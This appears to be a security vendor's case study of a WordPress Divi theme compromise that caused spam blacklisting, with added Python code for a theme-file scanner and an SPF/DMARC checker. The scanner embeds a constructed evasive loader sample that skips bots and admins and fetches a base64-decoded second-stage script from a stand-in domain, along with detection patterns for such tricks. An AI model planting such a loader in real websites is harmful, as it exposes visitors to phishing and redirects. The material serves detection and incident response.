Client

Enviroscope

Industry

Commercial & Industrial Building Maintenance Services

Challenge

Enviroscope experienced a security incident affecting its public website that caused unexpected behaviour for site visitors and, subsequently, email deliverability issues.

The organisation was blacklisted by multiple spam detection services, causing legitimate business emails to be blocked or filtered as spam, particularly on Microsoft email platforms. This resulted in critical communications failing to reach clients, severely disrupting service delivery, client engagement, invoicing, and day-to-day business operations.

At the same time, concerns that the public website may have been compromised heightened the risk to brand trust, security, and email reputation, turning the issue into a major operational and reputational threat that required urgent action.

Compounding the challenge, full administrative access to the WordPress hosting environment was not available, limiting visibility into provider-level logs and controls.

Investigation and Findings

Sentry Cyber conducted a targeted incident investigation and confirmed a malicious JavaScript injection within a Divi theme asset used by the Enviroscope website.

Key findings included
• Obfuscated malicious code injected into a Divi theme JavaScript file
• Malware designed to avoid detection by administrators, bots, and scanners
• Dynamic delivery of a second-stage payload from attacker-controlled infrastructure
• Visitor-targeted behaviour consistent with phishing or redirection campaigns
• Correlation between the website compromise and domain reputation degradation
• Increased likelihood of emails being flagged as junk by Microsoft email platforms

Due to restricted access to one of the hosting control panels, a provider-level compromise could not be ruled out.
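The findings above describe a loader that checks for logged-in administrators and crawlers before fetching a second stage from a decoded URL. The scanner below is an added example (not Sentry Cyber's tooling) showing how such an injection can be surfaced in a theme directory: each JavaScript file is hashed against a known-good baseline, and its contents are scored against heuristics for the reported evasion and obfuscation tricks. The Divi file paths are illustrative, the indicator weights and threshold are assumptions to be tuned per site, and both sample files (including the "injected" tail, whose decoded URL points at the reserved example.invalid domain) are constructed for this example.

```python
"""Scan WordPress theme JavaScript for an injected, obfuscated loader and
compare each file against a known-good hash baseline (a minimal file
integrity check). Added example; not Sentry Cyber's tooling. Every file,
path and hash below is constructed for the example."""
import base64
import hashlib
import re
from typing import Dict, List, Tuple

# Heuristics matching the reported behaviour: skip logged-in admins and
# crawlers, then load a second stage from a decoded URL. Weights and the
# threshold are assumptions; tune them against your own theme assets.
INDICATORS: List[Tuple[str, int, str]] = [
    (r"wordpress_logged_in", 3, "checks the WordPress login cookie"),
    (r"navigator\.userAgent", 1, "inspects the user agent"),
    (r"(?i)/[^/\n]*(bot|crawl|spider)[^/\n]*/i", 2, "crawler user-agent regex"),
    (r"\batob\s*\(", 2, "base64 decode at runtime"),
    (r"String\.fromCharCode", 2, "builds strings from char codes"),
    (r"\beval\s*\(", 2, "eval"),
    (r"createElement\s*\(\s*['\"]script['\"]\s*\)", 2, "dynamic script element"),
    (r"(?:\\x[0-9a-fA-F]{2}){8,}", 2, "long hex-escaped string"),
    (r"[A-Za-z0-9+/]{60,}={0,2}", 1, "long base64-like blob"),
]
SUSPICIOUS_THRESHOLD = 5

# Constructed stand-in for a legitimate Divi asset.
CLEAN_JS = r"""/* Divi theme script (constructed stand-in, not the real file) */
(function($){$(function(){$('.et_pb_toggle_title').on('click',function(){
$(this).closest('.et_pb_toggle').toggleClass('et_pb_toggle_open');});});})(jQuery);
"""

# Constructed injection appended to the asset. It carries the evasion checks
# and dynamic loading the findings describe; the decoded URL points at the
# reserved example.invalid domain, not real attacker infrastructure.
INJECTED_TAIL = r"""
;(function(){var u=navigator.userAgent;if(/bot|crawl|spider|slurp|facebook/i.test(u))return;
if(document.cookie.indexOf("wordpress_logged_in")!==-1)return;
var s=document.createElement("script");s[String.fromCharCode(115,114,99)]=atob("__B64__");
s["\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65"]("async","");document.head.appendChild(s);})();
"""


def sha256_of(content: str) -> str:
    return hashlib.sha256(content.encode("utf-8")).hexdigest()


def score_js(content: str) -> Tuple[int, List[str]]:
    """Sum indicator weights and report which heuristics matched."""
    score, hits = 0, []
    for pattern, weight, why in INDICATORS:
        if re.search(pattern, content):
            score += weight
            hits.append(why)
    return score, hits


def changed_files(files: Dict[str, str], baseline: Dict[str, str]) -> List[str]:
    """Paths whose hash differs from the baseline, or that the baseline lacks."""
    return sorted(p for p, c in files.items() if baseline.get(p) != sha256_of(c))


def scan(files: Dict[str, str], baseline: Dict[str, str]) -> Dict[str, dict]:
    """Combine the integrity check with the content heuristics per file."""
    report = {}
    changed = set(changed_files(files, baseline))
    for path, content in files.items():
        score, hits = score_js(content)
        report[path] = {"changed": path in changed, "score": score, "hits": hits,
                        "suspicious": score >= SUSPICIOUS_THRESHOLD}
    return report


def build_samples() -> Tuple[Dict[str, str], Dict[str, str]]:
    """Two theme files and a baseline taken before the injection (constructed)."""
    url = b"https://example.invalid/static/second-stage-loader-placeholder.js"
    injected = CLEAN_JS + INJECTED_TAIL.replace("__B64__", base64.b64encode(url).decode())
    scripts = "wp-content/themes/Divi/js/scripts.min.js"  # illustrative paths
    frontend = "wp-content/themes/Divi/includes/builder/scripts/frontend.js"
    baseline = {scripts: sha256_of(CLEAN_JS), frontend: sha256_of(CLEAN_JS)}
    files = {scripts: injected, frontend: CLEAN_JS}
    return files, baseline


if __name__ == "__main__":
    files, baseline = build_samples()
    for path, result in scan(files, baseline).items():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{flag:10} changed={result['changed']!s:5} score={result['score']:2} {path}")
        for why in result["hits"]:
            print(f"           - {why}")
```

A hash mismatch alone is not proof of compromise (theme updates change files too), and a clean hash is only as good as the baseline, which is why the scan reports both signals side by side; against a real site, read the files from disk and keep the baseline somewhere the web server cannot write.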

Response and Remediation

Sentry Cyber executed a rapid containment and remediation plan, responding within hours of engagement. Critical issues were identified through a combination of offline forensic analysis and live WordPress-level remediation, allowing threats to be contained and addressed immediately.

Recognising the significant impact on business operations and client communications, our team worked outside standard business hours to accelerate recovery. A comprehensive investigation and remediation report was delivered within one week, restoring email deliverability, securing the website, and stabilising business communications.

Actions taken included
• Preservation and review of website backups to identify indicators of compromise
• Identification and removal of malicious JavaScript from the affected theme file
• Validation that malicious visitor-side behaviour had ceased
• Targeted review of high-risk filesystem locations within accessible scope
• DNS and email authentication review to support recovery of domain reputation
• Guidance provided to reduce false-positive spam filtering

The malicious behaviour was successfully eradicated, and no further injection activity was observed following remediation.
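The DNS and email authentication review listed above is the part of the recovery that receivers such as Microsoft actually see. The checker below is an added example (not Sentry Cyber's tooling) that parses SPF and DMARC TXT records from strings, so it runs offline, and reports the weaknesses that most often keep a domain's mail in junk folders after a reputation hit: a permissive or missing "all" term, a deprecated ptr mechanism, more than one SPF record, more than ten DNS-lookup terms, a DMARC policy of none, and missing aggregate reporting. The two zones for example.com are constructed "before" and "after" records; the include:spf.protection.outlook.com term is the one Microsoft 365 publishes, everything else is illustrative.

```python
"""Review SPF and DMARC TXT records for common deliverability weaknesses.
Added example; not Sentry Cyber's tooling. Records are parsed from strings
so the check runs offline; the sample zones are constructed, not real DNS."""
import re
from typing import Dict, List

SPF_LOOKUP_MECHS = ("include", "a", "mx", "ptr", "exists", "redirect")
SPF_LOOKUP_LIMIT = 10  # RFC 7208 section 4.6.4


def spf_findings(txt_records: List[str]) -> List[str]:
    """Findings for the TXT records published at the domain apex."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if not spf:
        return ["HIGH: no SPF record; receivers cannot verify sending hosts"]
    if len(spf) > 1:
        return [f"HIGH: {len(spf)} SPF records published; RFC 7208 allows exactly one (permerror)"]
    findings, lookups, all_qual = [], 0, None
    for term in spf[0].split()[1:]:
        qual = term[0] if term[0] in "+-~?" else "+"
        name = re.split(r"[:=/]", term.lstrip("+-~?"), 1)[0].lower()
        if name in SPF_LOOKUP_MECHS:
            lookups += 1
        if name == "ptr":
            findings.append("MED: ptr mechanism is deprecated and slow to evaluate")
        if name == "all":
            all_qual = qual
    if lookups > SPF_LOOKUP_LIMIT:
        findings.append(f"HIGH: {lookups} DNS-lookup terms exceeds the limit of {SPF_LOOKUP_LIMIT} (permerror)")
    if all_qual in ("+", "?"):
        findings.append(f"HIGH: '{all_qual}all' lets any host pass SPF; use -all or ~all")
    elif all_qual is None:
        findings.append("MED: no 'all' term; unlisted hosts get a neutral result")
    elif all_qual == "~":
        findings.append("LOW: ~all softfail; -all is stricter once every sender is listed")
    return findings or ["OK: SPF syntax and policy look sound"]


def dmarc_findings(txt_records: List[str]) -> List[str]:
    """Findings for the TXT records published at _dmarc.<domain>."""
    recs = [r for r in txt_records if r.upper().startswith("V=DMARC1")]
    if not recs:
        return ["HIGH: no DMARC record; receivers cannot apply the domain's policy"]
    if len(recs) > 1:
        return ["HIGH: multiple DMARC records; receivers ignore all of them"]
    tags: Dict[str, str] = {}
    for part in recs[0].split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    findings = []
    policy = tags.get("p")
    if policy is None:
        findings.append("HIGH: missing required p= tag; record is invalid")
    elif policy.lower() == "none":
        findings.append("MED: p=none only monitors; spoofed mail is still delivered")
    if "rua" not in tags:
        findings.append("LOW: no rua= address; no aggregate reports on who sends as the domain")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        findings.append(f"LOW: pct={pct} applies the policy to only part of the mail")
    return findings or ["OK: DMARC enforces a policy and reporting is enabled"]


def review(zone: Dict[str, List[str]], domain: str) -> Dict[str, List[str]]:
    """Run both checks against a zone given as {name: [TXT records]}."""
    return {"spf": spf_findings(zone.get(domain, [])),
            "dmarc": dmarc_findings(zone.get("_dmarc." + domain, []))}


# Constructed zones for example.com: the "before" and "after" of a review.
WEAK_ZONE = {
    "example.com": ["v=spf1 include:spf.protection.outlook.com ptr a mx +all"],
    "_dmarc.example.com": ["v=DMARC1; p=none"],
}
HARDENED_ZONE = {
    "example.com": ["v=spf1 include:spf.protection.outlook.com ip4:203.0.113.10 -all"],
    "_dmarc.example.com": ["v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@example.com; pct=100"],
}

if __name__ == "__main__":
    for label, zone in (("weak", WEAK_ZONE), ("hardened", HARDENED_ZONE)):
        for check, items in review(zone, "example.com").items():
            for item in items:
                print(f"[{label}] {check}: {item}")
```

Against a live domain, feed the functions the TXT records returned by a resolver (one list per name) and verify DKIM separately, since it lives under per-selector names that cannot be enumerated from the zone apex. Fixing these records stops new reputation damage; it does not by itself clear an existing listing, which still has to be requested from each blocklist or filtering service.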

Outcome

• Website malware fully removed and validated
• Visitor risk from the injected script eliminated
• Domain reputation stabilised
• Email deliverability improved, particularly for Microsoft-based recipients
• Residual risk clearly identified and documented
• Client provided with a clear remediation and prevention roadmap

Lessons Learned

This incident highlighted how modern website malware can directly impact email reputation and business communications, even when email systems themselves are not directly compromised. It also demonstrated the importance of full administrative visibility at the hosting layer and the risks associated with legacy or inaccessible hosting environments.

Ongoing Recommendations

Sentry Cyber recommended
• Migration to a secure hosting provider with full administrative control
• Enforced MFA for all administrative access
• Regular patching and removal of unused website components
• File integrity monitoring for early detection of future tampering
• Adoption of Sentry Cyber’s Guardian Shield managed security service for continuous protection

Case Study Questions and Answers

What first indicated that something was wrong?

Enviroscope observed unusual behaviour affecting their website and a noticeable decline in email deliverability, particularly with emails being flagged as spam by Microsoft email platforms.

Was email infrastructure directly compromised?

No direct compromise of the email system was identified. The investigation determined that the website compromise negatively impacted domain reputation, which in turn affected email deliverability.

What type of malware was involved?

The incident involved malicious JavaScript injected into a WordPress Divi theme file. The code was obfuscated and designed to evade detection while delivering a second-stage payload to website visitors.

How did the malware avoid detection?

The malicious script was programmed to avoid execution for administrators, bots, APIs, and automated scanners. It only activated for normal website visitors, increasing dwell time and reducing the likelihood of early detection.

What risks did this pose to visitors?

Visitors were exposed to potential phishing content or malicious redirects, creating a risk to user safety and brand trust.

Why was the investigation challenging?

Full access to one of the hosting control panels was not available. This limited the ability to perform a complete provider-level audit and meant a hosting-layer compromise could not be fully ruled out.

How was the malware removed?

Sentry Cyber identified and removed the injected code directly from the affected theme file and validated that malicious behaviour had completely ceased after remediation.

How was containment verified?

Post-remediation testing confirmed that no further visitor-side injections were occurring and no additional indicators of compromise were detected within the accessible environment.

Did the incident have a long-term impact?

Once the malware was removed and DNS and email configuration guidance was applied, domain reputation began stabilising and email deliverability improved.

What could have prevented this incident?

Regular patching of website components, file integrity monitoring, enforced multi-factor authentication, and full administrative visibility at the hosting layer would have significantly reduced the likelihood and impact of the compromise.

What was the most important lesson learned?

Website security incidents can directly affect email reputation and business communications even when email systems themselves are not breached.

What ongoing protections were recommended?

Sentry Cyber recommended migration to a secure hosting provider, continuous monitoring, stronger access controls, and adoption of a managed security service to reduce recurrence risk.